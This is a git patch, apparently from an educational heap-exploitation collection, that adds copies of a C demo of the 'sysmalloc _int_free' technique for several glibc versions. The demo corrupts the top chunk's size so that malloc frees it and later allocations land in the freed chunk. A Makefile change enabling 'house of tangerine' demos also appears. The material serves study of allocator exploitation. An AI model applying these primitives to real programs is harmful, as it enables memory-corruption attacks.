----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.34/sysmalloc_int_free.c b/glibc_2.34/sysmalloc_int_free.c index f6810f7..b1974a2 100644 --- a/glibc_2.34/sysmalloc_int_free.c +++ b/glibc_2.34/sysmalloc_int_free.c @@ -10,7 +10,7 @@ #define CHUNK_HDR_SZ (SIZE_SZ*2) // same for x86_64 and x86 -#define MALLOC_ALIGN 0x10L +#define MALLOC_ALIGN (SIZE_SZ*2) #define MALLOC_MASK (-MALLOC_ALIGN) #define PAGESIZE sysconf(_SC_PAGESIZE) @@ -27,6 +27,7 @@ /** * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) * + GLIBC 2.39 (x86_64, x86 & aarch64) * + GLIBC 2.34 (x86_64, x86 & aarch64) * + GLIBC 2.31 (x86_64, x86 & aarch64) diff --git a/glibc_2.35/sysmalloc_int_free.c b/glibc_2.35/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.35/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. + * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.36/sysmalloc_int_free.c b/glibc_2.36/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.36/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. + * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.37/sysmalloc_int_free.c b/glibc_2.37/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.37/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. + * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.38/sysmalloc_int_free.c b/glibc_2.38/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.38/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. + * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} From 39ecc170f5e1e2f2df45624636d9f809e5a0bcb4 Mon Sep 17 00:00:00 2001 From: Kyle Zeng Date: Tue, 16 Apr 2024 22:10:36 -0700 Subject: [PATCH 2/3] enable house_of_tangerine --- Makefile | 18 ++-- glibc_2.32/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.33/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.35/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.36/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.37/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.38/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ 7 files changed, 975 insertions(+), 9 deletions(-) create mode 100644 glibc_2.32/house_of_tangerine.c create mode 100644 glibc_2.33/house_of_tangerine.c create mode 100644 glibc_2.35/house_of_tangerine.c create mode 100644 glibc_2.36/house_of_tangerine.c create mode 100644 glibc_2.37/house_of_tangerine.c create mode 100644 glibc_2.38/house_of_tangerine.c diff --git a/Makefile b/Makefile index 7a51557..27bfc2e 100644 --- a/Makefile +++ b/Makefile @@ -1,15 +1,15 @@ BASE = malloc_playground first_fit calc_tcache_idx V2.23 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_orange house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free V2.24 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free -V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free -V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink sysmalloc_int_free -V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks 